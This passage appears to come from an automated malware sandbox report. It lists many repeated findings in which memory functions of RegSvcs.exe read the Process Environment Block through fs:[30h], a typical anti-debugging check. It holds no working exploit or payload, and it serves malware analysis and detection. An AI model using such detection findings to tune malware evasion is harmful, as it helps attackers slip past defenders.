          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E2349 mov eax, dword ptr fs:[00000030h] 9_2_018E2349
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E035C mov eax, dword ptr fs:[00000030h] 9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E035C mov eax, dword ptr fs:[00000030h] 9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E035C mov eax, dword ptr fs:[00000030h] 9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E035C mov ecx, dword ptr fs:[00000030h] 9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E035C mov eax, dword ptr fs:[00000030h] 9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E035C mov eax, dword ptr fs:[00000030h] 9_2_018E035C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0193634F mov eax, dword ptr fs:[00000030h] 9_2_0193634F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0190437C mov eax, dword ptr fs:[00000030h] 9_2_0190437C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E0283 mov eax, dword ptr fs:[00000030h] 9_2_018E0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E0283 mov eax, dword ptr fs:[00000030h] 9_2_018E0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E0283 mov eax, dword ptr fs:[00000030h] 9_2_018E0283
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0189E284 mov eax, dword ptr fs:[00000030h] 9_2_0189E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0189E284 mov eax, dword ptr fs:[00000030h] 9_2_0189E284
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h] 9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F62A0 mov ecx, dword ptr fs:[00000030h] 9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h] 9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h] 9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h] 9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018F62A0 mov eax, dword ptr fs:[00000030h] 9_2_018F62A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0186A2C3 mov eax, dword ptr fs:[00000030h] 9_2_0186A2C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_019362D6 mov eax, dword ptr fs:[00000030h] 9_2_019362D6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018702E1 mov eax, dword ptr fs:[00000030h] 9_2_018702E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018702E1 mov eax, dword ptr fs:[00000030h] 9_2_018702E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018702E1 mov eax, dword ptr fs:[00000030h] 9_2_018702E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185823B mov eax, dword ptr fs:[00000030h] 9_2_0185823B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0191A250 mov eax, dword ptr fs:[00000030h] 9_2_0191A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0191A250 mov eax, dword ptr fs:[00000030h] 9_2_0191A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E8243 mov eax, dword ptr fs:[00000030h] 9_2_018E8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018E8243 mov ecx, dword ptr fs:[00000030h] 9_2_018E8243
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0193625D mov eax, dword ptr fs:[00000030h] 9_2_0193625D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0185A250 mov eax, dword ptr fs:[00000030h] 9_2_0185A250
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01866259 mov eax, dword ptr fs:[00000030h] 9_2_01866259
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01910274 mov eax, dword ptr fs:[00000030h] 9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01910274 mov eax, dword ptr fs:[00000030h]9_2_01910274
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864260 mov eax, dword ptr fs:[00000030h]9_2_01864260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864260 mov eax, dword ptr fs:[00000030h]9_2_01864260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864260 mov eax, dword ptr fs:[00000030h]9_2_01864260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185826B mov eax, dword ptr fs:[00000030h]9_2_0185826B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01894588 mov eax, dword ptr fs:[00000030h]9_2_01894588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862582 mov eax, dword ptr fs:[00000030h]9_2_01862582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01862582 mov ecx, dword ptr fs:[00000030h]9_2_01862582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E59C mov eax, dword ptr fs:[00000030h]9_2_0189E59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E05A7 mov eax, dword ptr fs:[00000030h]9_2_018E05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E05A7 mov eax, dword ptr fs:[00000030h]9_2_018E05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E05A7 mov eax, dword ptr fs:[00000030h]9_2_018E05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018845B1 mov eax, dword ptr fs:[00000030h]9_2_018845B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018845B1 mov eax, dword ptr fs:[00000030h]9_2_018845B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E5CF mov eax, dword ptr fs:[00000030h]9_2_0189E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E5CF mov eax, dword ptr fs:[00000030h]9_2_0189E5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018665D0 mov eax, dword ptr fs:[00000030h]9_2_018665D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A5D0 mov eax, dword ptr fs:[00000030h]9_2_0189A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A5D0 mov eax, dword ptr fs:[00000030h]9_2_0189A5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C5ED mov eax, dword ptr fs:[00000030h]9_2_0189C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C5ED mov eax, dword ptr fs:[00000030h]9_2_0189C5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018625E0 mov eax, dword ptr fs:[00000030h]9_2_018625E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E5E7 mov eax, dword ptr fs:[00000030h]9_2_0188E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6500 mov eax, dword ptr fs:[00000030h]9_2_018F6500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934500 mov eax, dword ptr fs:[00000030h]9_2_01934500
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870535 mov eax, dword ptr fs:[00000030h]9_2_01870535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E53E mov eax, dword ptr fs:[00000030h]9_2_0188E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868550 mov eax, dword ptr fs:[00000030h]9_2_01868550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868550 mov eax, dword ptr fs:[00000030h]9_2_01868550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189656A mov eax, dword ptr fs:[00000030h]9_2_0189656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189656A mov eax, dword ptr fs:[00000030h]9_2_0189656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189656A mov eax, dword ptr fs:[00000030h]9_2_0189656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191A49A mov eax, dword ptr fs:[00000030h]9_2_0191A49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018664AB mov eax, dword ptr fs:[00000030h]9_2_018664AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018944B0 mov ecx, dword ptr fs:[00000030h]9_2_018944B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EA4B0 mov eax, dword ptr fs:[00000030h]9_2_018EA4B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018604E5 mov ecx, dword ptr fs:[00000030h]9_2_018604E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898402 mov eax, dword ptr fs:[00000030h]9_2_01898402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898402 mov eax, dword ptr fs:[00000030h]9_2_01898402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898402 mov eax, dword ptr fs:[00000030h]9_2_01898402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185C427 mov eax, dword ptr fs:[00000030h]9_2_0185C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E420 mov eax, dword ptr fs:[00000030h]9_2_0185E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E420 mov eax, dword ptr fs:[00000030h]9_2_0185E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185E420 mov eax, dword ptr fs:[00000030h]9_2_0185E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E6420 mov eax, dword ptr fs:[00000030h]9_2_018E6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A430 mov eax, dword ptr fs:[00000030h]9_2_0189A430
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0191A456 mov eax, dword ptr fs:[00000030h]9_2_0191A456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189E443 mov eax, dword ptr fs:[00000030h]9_2_0189E443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188245A mov eax, dword ptr fs:[00000030h]9_2_0188245A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185645D mov eax, dword ptr fs:[00000030h]9_2_0185645D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EC460 mov ecx, dword ptr fs:[00000030h]9_2_018EC460
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188A470 mov eax, dword ptr fs:[00000030h]9_2_0188A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188A470 mov eax, dword ptr fs:[00000030h]9_2_0188A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188A470 mov eax, dword ptr fs:[00000030h]9_2_0188A470
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190678E mov eax, dword ptr fs:[00000030h]9_2_0190678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018607AF mov eax, dword ptr fs:[00000030h]9_2_018607AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019147A0 mov eax, dword ptr fs:[00000030h]9_2_019147A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186C7C0 mov eax, dword ptr fs:[00000030h]9_2_0186C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E07C3 mov eax, dword ptr fs:[00000030h]9_2_018E07C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018827ED mov eax, dword ptr fs:[00000030h]9_2_018827ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018827ED mov eax, dword ptr fs:[00000030h]9_2_018827ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018827ED mov eax, dword ptr fs:[00000030h]9_2_018827ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE7E1 mov eax, dword ptr fs:[00000030h]9_2_018EE7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018647FB mov eax, dword ptr fs:[00000030h]9_2_018647FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018647FB mov eax, dword ptr fs:[00000030h]9_2_018647FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C700 mov eax, dword ptr fs:[00000030h]9_2_0189C700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860710 mov eax, dword ptr fs:[00000030h]9_2_01860710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01890710 mov eax, dword ptr fs:[00000030h]9_2_01890710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C720 mov eax, dword ptr fs:[00000030h]9_2_0189C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C720 mov eax, dword ptr fs:[00000030h]9_2_0189C720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189273C mov eax, dword ptr fs:[00000030h]9_2_0189273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189273C mov ecx, dword ptr fs:[00000030h]9_2_0189273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189273C mov eax, dword ptr fs:[00000030h]9_2_0189273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DC730 mov eax, dword ptr fs:[00000030h]9_2_018DC730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189674D mov esi, dword ptr fs:[00000030h]9_2_0189674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189674D mov eax, dword ptr fs:[00000030h]9_2_0189674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189674D mov eax, dword ptr fs:[00000030h]9_2_0189674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE75D mov eax, dword ptr fs:[00000030h]9_2_018EE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860750 mov eax, dword ptr fs:[00000030h]9_2_01860750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2750 mov eax, dword ptr fs:[00000030h]9_2_018A2750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2750 mov eax, dword ptr fs:[00000030h]9_2_018A2750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E4755 mov eax, dword ptr fs:[00000030h]9_2_018E4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868770 mov eax, dword ptr fs:[00000030h]9_2_01868770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870770 mov eax, dword ptr fs:[00000030h]9_2_01870770
